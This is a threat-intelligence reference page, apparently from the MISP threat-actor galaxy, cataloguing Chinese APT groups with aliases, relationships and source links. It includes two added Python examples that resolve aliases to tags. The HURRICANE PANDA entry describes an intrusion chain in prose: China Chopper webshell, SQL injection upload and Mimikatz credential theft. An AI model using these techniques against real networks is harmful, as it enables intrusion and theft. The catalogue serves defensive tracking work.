https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=f1265df5-6e5e-4fcc-9828-d4ddbbafd3d7&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://attack.mitre.org/groups/G0006/

https://www.nytimes.com/2014/05/20/us/us-to-charge-chinese-workers-with-cyberspying.html

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
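The entry above is rendered from cluster JSON: a cluster `type` gives the `misp-galaxy:<type>="<value>"` tag, `meta.synonyms` gives the "is also known as" list, and `related[]` points at other cluster values by `dest-uuid`. The following Python is an added example, not code from the MISP project, showing how an application reusing the JSON would derive those three things. Both embedded clusters are constructed for this example: the APT1 entry mirrors the synonyms and relationship rendered above but uses placeholder UUIDs, and the "Comment Crew" synonym on the intrusion-set stand-in is there to show an alias shared by two galaxies. The second `related` entry points at a UUID that is deliberately not loaded.

```python
"""Resolve MISP galaxy cluster values, synonyms and relationships to tags.

Added example, not MISP project code. The two clusters below are
constructed: placeholder UUIDs, a trimmed APT1 entry, and an extra
"Comment Crew" synonym on the intrusion-set side to show alias ambiguity.
"""
from __future__ import annotations

import json
import unicodedata

# Constructed sample in the galaxy cluster layout: "type" at the top, one
# object per cluster value carrying meta.synonyms, meta.refs and related[].
THREAT_ACTOR_CLUSTER = json.loads(r"""
{"name": "Threat Actor", "type": "threat-actor", "uuid": "00000000-0000-4000-8000-000000000001",
 "values": [{
   "value": "APT1", "uuid": "00000000-0000-4000-8000-0000000000a1",
   "meta": {"synonyms": ["COMMENT PANDA", "PLA Unit 61398", "Comment Crew", "G0006"],
            "refs": ["https://attack.mitre.org/groups/G0006/"]},
   "related": [
     {"dest-uuid": "00000000-0000-4000-8000-0000000000b1", "type": "similar",
      "tags": ["estimative-language:likelihood-probability=\"likely\""]},
     {"dest-uuid": "00000000-0000-4000-8000-0000000000c1", "type": "similar", "tags": []}]}]}
""")

# Constructed stand-in for the mitre-intrusion-set galaxy, so the first
# "similar" relationship above has a target to resolve to.
MITRE_CLUSTER = json.loads(r"""
{"name": "Intrusion Set", "type": "mitre-intrusion-set", "uuid": "00000000-0000-4000-8000-000000000002",
 "values": [{"value": "APT1 - G0006", "uuid": "00000000-0000-4000-8000-0000000000b1",
             "meta": {"synonyms": ["Comment Crew"]}}]}
""")


def galaxy_tag(cluster_type: str, value: str) -> str:
    """Build the tag MISP attaches for a cluster value: misp-galaxy:<type>="<value>"."""
    if '"' in value:
        # A literal double quote would break the tag syntax; refusing such a
        # value is this example's choice, the galaxy data avoids them.
        raise ValueError(f"cluster value contains a double quote: {value!r}")
    return f'misp-galaxy:{cluster_type}="{value}"'


def normalise(name: str) -> str:
    """Case-, accent- and whitespace-insensitive lookup key for aliases."""
    decomposed = unicodedata.normalize("NFKD", name)
    stripped = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return " ".join(stripped.casefold().split())


class GalaxyIndex:
    """Alias and UUID lookup across one or more galaxy clusters."""

    def __init__(self, *clusters: dict) -> None:
        self.by_alias: dict[str, set[str]] = {}  # normalised alias -> tags
        self.by_uuid: dict[str, str] = {}        # value uuid -> tag
        self.related: dict[str, list[tuple]] = {}
        pending = []
        for cluster in clusters:
            ctype = cluster["type"]
            for entry in cluster.get("values", []):
                tag = galaxy_tag(ctype, entry["value"])
                self.by_uuid[entry["uuid"]] = tag
                # The value itself and every synonym resolve to the same tag.
                # An alias used by several clusters keeps every tag, so the
                # ambiguity is visible to the caller instead of overwritten.
                synonyms = entry.get("meta", {}).get("synonyms", [])
                for alias in [entry["value"], *synonyms]:
                    self.by_alias.setdefault(normalise(alias), set()).add(tag)
                pending.extend((tag, rel) for rel in entry.get("related", []))
        # Relationships reference UUIDs, so link them after every cluster is
        # loaded; a dest-uuid from a galaxy that was not loaded becomes None.
        for tag, rel in pending:
            dest = self.by_uuid.get(rel["dest-uuid"])
            self.related.setdefault(tag, []).append(
                (rel.get("type", "similar"), dest, list(rel.get("tags", [])))
            )

    def resolve(self, name: str) -> list[str]:
        """All tags a name or alias refers to, sorted; [] if unknown."""
        return sorted(self.by_alias.get(normalise(name), set()))

    def relationships(self, tag: str) -> list[tuple]:
        """(type, destination tag or None, qualifier tags) for one tag."""
        return list(self.related.get(tag, []))


INDEX = GalaxyIndex(THREAT_ACTOR_CLUSTER, MITRE_CLUSTER)

if __name__ == "__main__":
    for name in ("G0006", "comment crew", "Unit 8200"):
        print(f"{name!r} -> {INDEX.resolve(name)}")
    for rel in INDEX.relationships(galaxy_tag("threat-actor", "APT1")):
        print("related:", rel)
```

Two points matter when automating against galaxy data. A synonym is not a key: the same alias legitimately appears in several galaxies (as the page's own APT17 entry shows with Axiom and G0001), so correlation should be done on the tag or UUID and an ambiguous `resolve()` result surfaced rather than picked silently. Relationships are by UUID, so they only resolve when the referenced galaxy (here mitre-intrusion-set) is loaded alongside; a `None` destination means the galaxy is missing, not that the relationship is bogus.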

Nitro

These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.

The tag is: misp-galaxy:threat-actor="Nitro"

Nitro is also known as:

  • Covert Grove

Table 11770. Table References

Links

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf

https://unit42.paloaltonetworks.com/new-indicators-compromise-apt-group-nitro-uncovered/

https://blog.trendmicro.com/trendlabs-security-intelligence/the-significance-of-the-nitro-attacks/

Dust Storm

The threat actors behind Operation Dust Storm have been active since at least 2010; the group has targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.

The tag is: misp-galaxy:threat-actor="Dust Storm"

Dust Storm is also known as:

  • G0031

Dust Storm has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Dust Storm - G0031" with estimative-language:likelihood-probability="likely"

Table 11771. Table References

Links

https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack

https://attack.mitre.org/groups/G0031/

WET PANDA

The tag is: misp-galaxy:threat-actor="WET PANDA"

WET PANDA is also known as:

  • Red Chimera

Table 11772. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

FOXY PANDA

Adversary group targeting telecommunication and technology organizations.

The tag is: misp-galaxy:threat-actor="FOXY PANDA"

Table 11773. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182276.pdf

PREDATOR PANDA

The tag is: misp-galaxy:threat-actor="PREDATOR PANDA"

Table 11774. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

UNION PANDA

The tag is: misp-galaxy:threat-actor="UNION PANDA"

Table 11775. Table References

Links

https://dokumen.tips/documents/detecting-and-responding-pandas-and-bears.html

SPICY PANDA

The tag is: misp-galaxy:threat-actor="SPICY PANDA"

Table 11776. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

ELOQUENT PANDA

The tag is: misp-galaxy:threat-actor="ELOQUENT PANDA"

Table 11777. Table References

Links

https://dokumen.tips/documents/detecting-and-responding-pandas-and-bears.html

DIZZY PANDA

The tag is: misp-galaxy:threat-actor="DIZZY PANDA"

DIZZY PANDA is also known as:

  • LadyBoyle

Grayling

Grayling activity was first observed in early 2023, when a number of victims were identified with distinctive malicious DLL side-loading activity. Grayling appears to target organisations in Asia; however, one unknown organisation in the United States was also targeted. Industries targeted include biomedical, government and information technology. Grayling uses a variety of tools during its attacks, including well-known tools such as Cobalt Strike and Havoc as well as others.

The tag is: misp-galaxy:threat-actor="Grayling"

Table 11778. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

APT2

Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since 2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'

The tag is: misp-galaxy:threat-actor="APT2"

APT2 is also known as:

  • PLA Unit 61486

  • PUTTER PANDA

  • MSUpdater

  • 4HCrew

  • SULPHUR

  • SearchFire

  • TG-6952

  • G0024

APT2 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Putter Panda - G0024" with estimative-language:likelihood-probability="likely"

Table 11779. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://www.cfr.org/interactive/cyber-operations/putter-panda

https://attack.mitre.org/groups/G0024

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

APT3

Symantec described UPS in a 2016 report as: 'Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Traditionally, the group attacked organizations in the US as well as other targets. However, Buckeye's focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.'

The tag is: misp-galaxy:threat-actor="APT3"

APT3 is also known as:

  • GOTHIC PANDA

  • TG-0110

  • Group 6

  • UPS

  • Buckeye

  • Boyusec

  • BORON

  • BRONZE MAYFAIR

  • Red Sylvan

APT3 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT3 - G0022" with estimative-language:likelihood-probability="likely"

Table 11780. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://www.cfr.org/interactive/cyber-operations/apt-3

https://www.secureworks.com/research/threat-profiles/bronze-mayfair

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

DarkHotel

Kaspersky described DarkHotel in a 2014 report as: '… DarkHotel drives its campaigns by spear-phishing targets with highly advanced Flash zero-day exploits that effectively evade the latest Windows and Adobe defenses, and yet they also imprecisely spread among large numbers of vague targets with peer-to-peer spreading tactics. Moreover, this crew's most unusual characteristic is that for several years the Darkhotel APT has maintained a capability to use hotel networks to follow and hit selected targets as they travel around the world.'

The tag is: misp-galaxy:threat-actor="DarkHotel"

DarkHotel is also known as:

  • DUBNIUM

  • Fallout Team

  • Karba

  • Luder

  • Nemim

  • Nemin

  • Tapaoux

  • Pioneer

  • Shadow Crane

  • APT-C-06

  • SIG25

  • TUNGSTEN BRIDGE

  • T-APT-02

  • G0012

  • ATK52

  • Zigzag Hail

DarkHotel has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="DUBNIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Zigzag Hail" with estimative-language:likelihood-probability="likely"

Table 11781. Table References

Links

https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/

https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2

https://securelist.com/blog/research/66779/the-darkhotel-apt/

https://securelist.com/the-darkhotel-apt/66779/

https://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726

https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/

https://www.cfr.org/interactive/cyber-operations/darkhotel

https://www.securityweek.com/darkhotel-apt-uses-new-methods-target-politicians

https://attack.mitre.org/groups/G0012/

https://www.secureworks.com/research/threat-profiles/tungsten-bridge

https://www.antiy.cn/research/notice&report/research_report/20200522.html

APT12

A group of China-based attackers, who conducted a number of spear phishing attacks in 2013.

The tag is: misp-galaxy:threat-actor="APT12"

APT12 is also known as:

  • NUMBERED PANDA

  • TG-2754

  • BeeBus

  • Group 22

  • DynCalc

  • Calc Team

  • DNSCalc

  • Crimson Iron

  • IXESHE

  • BRONZE GLOBE

APT12 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT12 - G0005" with estimative-language:likelihood-probability="likely"

Table 11782. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

https://www.cfr.org/interactive/cyber-operations/apt-12

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

https://www.secureworks.com/research/threat-profiles/bronze-globe

https://www.mandiant.com/resources/insights/apt-groups

APT16

Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear-phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.

The tag is: misp-galaxy:threat-actor="APT16"

APT16 is also known as:

  • SVCMONDR

  • G0023

Table 11783. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html

https://www.cfr.org/interactive/cyber-operations/apt-16

https://attack.mitre.org/groups/G0023

https://www.mandiant.com/resources/insights/apt-groups

https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/

APT17

FireEye described APT17 in a 2015 report as: 'APT17, also known as DeputyDog, is a China based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.'

The tag is: misp-galaxy:threat-actor="APT17"

APT17 is also known as:

  • Group 8

  • AURORA PANDA

  • Hidden Lynx

  • Tailgater Team

  • Dogfish

  • BRONZE KEYSTONE

  • G0025

  • Group 72

  • G0001

  • Axiom

  • HELIUM

APT17 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT17 - G0025" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

Table 11784. Table References

Links

https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf

https://www.cfr.org/interactive/cyber-operations/apt-17

https://www.carbonblack.com/2013/02/08/bit9-and-our-customers-security/

https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware

https://web.archive.org/web/20130920000343/https://www.symantec.com/connect/blogs/hidden-lynx-professional-hackers-hire

https://www.recordedfuture.com/hidden-lynx-analysis/

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://attack.mitre.org/groups/G0025/

https://cfr.org/cyber-operations/axiom

https://attack.mitre.org/groups/G0001/

https://www.youtube.com/watch?v=NFJqD-LcpIg

https://www.mandiant.com/resources/insights/apt-groups

APT18

Wekby was described by Palo Alto Networks in a 2015 report as: 'Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeam's Flash zero-day exploit.'

The tag is: misp-galaxy:threat-actor="APT18"

APT18 is also known as:

  • DYNAMITE PANDA

  • TG-0416

  • SCANDIUM

  • PLA Navy

  • Wekby

  • G0026

APT18 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT18 - G0026" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="SAMURAI PANDA" with estimative-language:likelihood-probability="likely"

Table 11785. Table References

Links

https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828

https://www.cfr.org/interactive/cyber-operations/apt-18

https://attack.mitre.org/groups/G0026

https://www.mandiant.com/resources/insights/apt-groups

APT19

Adversary group targeting financial, technology and non-profit organisations.

The tag is: misp-galaxy:threat-actor="APT19"

APT19 is also known as:

  • DEEP PANDA

  • Codoso

  • WebMasters

  • KungFu Kittens

  • Black Vine

  • TEMP.Avengers

  • Group 13

  • PinkPanther

  • Shell Crew

  • BRONZE FIRESTONE

  • G0009

  • G0073

  • Pupa

  • Sunshop Group

APT19 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Deep Panda - G0009" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT19 - G0073" with estimative-language:likelihood-probability="likely"

Table 11786. Table References

Links

http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

https://www.cfr.org/interactive/cyber-operations/deep-panda

https://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/

https://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/

https://www.crowdstrike.com/blog/department-labor-strategic-web-compromise/

https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/

https://krebsonsecurity.com/2015/06/catching-up-on-the-opm-breach/

https://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/

https://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

https://www.crowdstrike.com/blog/ironman-deep-panda-uses-sakula-malware-target-organizations-multiple-sectors/

https://www.abc.net.au/news/2014-11-13/g20-china-affliliated-hackers-breaches-australian-media/5889442

https://www.washingtonpost.com/business/economy/keypoint-suffers-network-breach-thousands-of-fed-workers-could-be-affected/2014/12/18/e6c7146c-86e1-11e4-a702-fa31ff4ae98e_story.html

https://www.seattletimes.com/business/local-business/feds-warned-premera-about-security-flaws-before-breach/

https://krebsonsecurity.com/2015/05/carefirst-blue-cross-breach-hits-1-1m/

https://threatvector.cylance.com/en_us/home/shell-crew-variants-continue-to-fly-under-big-avs-radar.html

https://www.bleepingcomputer.com/news/security/us-arrests-chinese-man-involved-with-sakula-malware-used-in-opm-and-anthem-hacks/

https://gizmodo.com/u-s-indicts-chinese-hacker-spies-in-conspiracy-to-stea-1830111695

https://www.cyberscoop.com/anthem-breach-indictment-chinese-national/

https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group

https://attack.mitre.org/groups/G0009/

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/

https://www.nytimes.com/2016/06/12/technology/the-chinese-hackers-in-the-back-office.html

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

https://www.mandiant.com/resources/insights/apt-groups

https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel

https://www.youtube.com/watch?v=FC9ARZIZglI
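The tag, alias and relationship lines that every entry on this page repeats are rendered from the galaxy's cluster JSON, and the first job most teams have with this data is resolving the vendor name in a report (DEEP PANDA, Shell Crew, G0009) to the one tag MISP will attach. The following is an added example, not code from the MISP project: it builds that alias index from a constructed sample of cluster JSON that mirrors the real layout (values[].value, meta.synonyms, related[].dest-uuid and the tags on a relationship), with invented UUIDs and synonym lists trimmed to a few entries each. It also renders the "has relationships with" lines by resolving dest-uuid against a second galaxy, and surfaces aliases that point at more than one cluster, which this page itself contains: G0013 is listed under both Naikon and APT30.

```python
import re
from collections import defaultdict

# Constructed sample in the MISP galaxy cluster layout. UUIDs are invented and
# synonym lists are trimmed copies of the entries on this page.
THREAT_ACTOR_GALAXY = {
    "type": "threat-actor",
    "values": [
        {"uuid": "11111111-1111-4111-8111-111111111111", "value": "APT19",
         "meta": {"synonyms": ["DEEP PANDA", "Codoso", "Shell Crew", "G0009", "G0073"]},
         "related": [{"dest-uuid": "aaaaaaaa-aaaa-4aaa-8aaa-aaaaaaaaaaaa", "type": "similar",
                      "tags": ['estimative-language:likelihood-probability="likely"']}]},
        {"uuid": "22222222-2222-4222-8222-222222222222", "value": "Naikon",
         "meta": {"synonyms": ["PLA Unit 78020", "OVERRIDE PANDA", "G0019", "G0013"]},
         "related": []},
        {"uuid": "33333333-3333-4333-8333-333333333333", "value": "APT30",
         "meta": {"synonyms": ["G0013"]}, "related": []},
    ],
}
MITRE_GALAXY = {
    "type": "mitre-intrusion-set",
    "values": [{"uuid": "aaaaaaaa-aaaa-4aaa-8aaa-aaaaaaaaaaaa",
                "value": "Deep Panda - G0009", "meta": {}}],
}


def normalize(name):
    """Fold case and strip punctuation/whitespace so 'Deep Panda', 'DEEP PANDA'
    and 'DeepPanda' key the same entry."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def tag_for(galaxy_type, value):
    """The tag string exactly as MISP attaches it to an event or attribute."""
    return f'misp-galaxy:{galaxy_type}="{value}"'


def build_alias_index(*galaxies):
    """Map each normalized value/synonym to the set of tags claiming it. A set,
    because one alias can sit in two clusters (G0013 under Naikon and APT30)."""
    index = defaultdict(set)
    for galaxy in galaxies:
        for cluster in galaxy["values"]:
            names = [cluster["value"], *cluster.get("meta", {}).get("synonyms", [])]
            for name in names:
                index[normalize(name)].add(tag_for(galaxy["type"], cluster["value"]))
    return dict(index)


def resolve(alias, index):
    """Candidate tags for an alias, sorted; empty list when unknown."""
    return sorted(index.get(normalize(alias), ()))


def ambiguous_aliases(index):
    """Aliases that resolve to more than one cluster: review before auto-tagging."""
    return {alias: sorted(tags) for alias, tags in index.items() if len(tags) > 1}


def related_lines(cluster, *galaxies):
    """Render the 'has relationships with' lines by resolving each related
    dest-uuid against the loaded galaxies; dangling references are skipped."""
    by_uuid = {c["uuid"]: tag_for(g["type"], c["value"])
               for g in galaxies for c in g["values"]}
    lines = []
    for rel in cluster.get("related", []):
        dest = by_uuid.get(rel["dest-uuid"])
        if dest is None:
            continue
        qualifier = "".join(f" with {t}" for t in rel.get("tags", []))
        lines.append(f"{rel['type']}: {dest}{qualifier}")
    return lines


INDEX = build_alias_index(THREAT_ACTOR_GALAXY, MITRE_GALAXY)

if __name__ == "__main__":
    print(resolve("Deep Panda", INDEX))
    print(ambiguous_aliases(INDEX))
    print(related_lines(THREAT_ACTOR_GALAXY["values"][0], THREAT_ACTOR_GALAXY, MITRE_GALAXY))
```

Resolution is by normalized string only: an ambiguous alias is handed back as a list for an analyst rather than silently picking the first cluster, and a related entry whose dest-uuid is not in any loaded galaxy is dropped instead of raising, which is what happens in practice when only one galaxy file is pulled.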

Naikon

Kaspersky described Naikon in a 2015 report as: 'The Naikon group is mostly active in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, and Nepal, hitting a variety of targets in a very opportunistic way.'

The tag is: misp-galaxy:threat-actor="Naikon"

Naikon is also known as:

  • PLA Unit 78020

  • OVERRIDE PANDA

  • Camerashy

  • BRONZE GENEVA

  • G0019

  • Naikon

  • BRONZE STERLING

  • G0013

Naikon has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Naikon - G0019" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT30 - G0013" with estimative-language:likelihood-probability="likely"

Table 11787. Table References

Links

https://securelist.com/analysis/publications/69953/the-naikon-apt/

https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

https://usa.kaspersky.com/resource-center/threats/naikon-targeted-attacks

https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

https://threatconnect.com/blog/tag/naikon/

https://attack.mitre.org/groups/G0019/

https://www.secureworks.com/research/threat-profiles/bronze-geneva

https://cyware.com/news/chinese-naikon-group-back-with-new-espionage-attack-66a8413d

https://cluster25.io/2022/04/29/lotus-panda-awake-last-strike/

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

APT30

APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.

The tag is: misp-galaxy:threat-actor="APT30"

APT30 is also known as:

  • G0013

APT30 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Raspberry Typhoon" with estimative-language:likelihood-probability="likely"

Table 11788. Table References

Links

https://attack.mitre.org/wiki/Group/G0013

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

https://www.mandiant.com/resources/insights/apt-groups

HURRICANE PANDA

We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA’s preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky to have caught an administrator who might be logged into that web server at the time, they will have gained domain administrator credentials and can now roam your network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.

The tag is: misp-galaxy:threat-actor="HURRICANE PANDA"

Table 11790. Table References

Links

http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/

https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/

https://www.crowdstrike.com/blog/storm-chasing/

APT27

A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.

The tag is: misp-galaxy:threat-actor="APT27"

APT27 is also known as:

  • GreedyTaotie

  • TG-3390

  • EMISSARY PANDA

  • TEMP.Hippo

  • Red Phoenix

  • Budworm

  • Group 35

  • ZipToken

  • Iron Tiger

  • BRONZE UNION

  • Lucky Mouse

  • G0027

  • Iron Taurus

  • Earth Smilodon

APT27 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Threat Group-3390 - G0027" with estimative-language:likelihood-probability="likely"

Table 11791. Table References

Links

https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf

https://web.archive.org/web/20140129192702/https://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/

https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/

https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf

https://www.cfr.org/interactive/cyber-operations/iron-tiger

https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-hacked-government-data-center/

https://www.secureworks.com/research/bronze-union

http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/

https://securelist.com/luckymouse-ndisproxy-driver/87914/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.09.17.Operation_Iron_Tiger/Operation%20Iron%20Tiger%20Appendix.pdf

https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://attack.mitre.org/groups/G0027/

https://www.secureworks.com/research/threat-profiles/bronze-union

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

APT10

menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.

The tag is: misp-galaxy:threat-actor="APT10"

APT10 is also known as:

  • STONE PANDA

  • Menupass Team

  • happyyongzi

  • POTASSIUM

  • Red Apollo

  • CVNX

  • HOGFISH

  • Cloud Hopper

  • BRONZE RIVERSIDE

  • ATK41

  • G0045

  • Granite Taurus

  • TA429

APT10 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="menuPass - G0045" with estimative-language:likelihood-probability="likely"

Table 11792. Table References

Links

https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

https://www.cfr.org/interactive/cyber-operations/apt-10

